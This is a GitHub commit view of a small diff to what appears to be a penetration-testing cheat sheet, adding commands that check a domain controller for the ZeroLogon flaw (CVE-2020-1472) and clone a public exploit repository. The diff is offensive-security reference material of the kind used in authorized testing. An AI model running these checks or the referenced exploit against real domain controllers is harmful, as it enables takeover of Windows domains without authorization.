Add python check for ZeroLogon

This commit is contained in:
CravateRouge 2021-09-30 23:38:48 +02:00 committed by GitHub
parent df7172dca1
commit 52d83bea5f
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -534,6 +534,9 @@ Exploit steps from the white paper
* `cve-2020-1472-exploit.py` - Python script from dirkjanm
```powershell
# Check (https://github.com/SecuraBV/CVE-2020-1472)
proxychains python3 zerologon_tester.py DC01 172.16.1.5
$ git clone https://github.com/dirkjanm/CVE-2020-1472.git
# Activate a virtual env to install impacket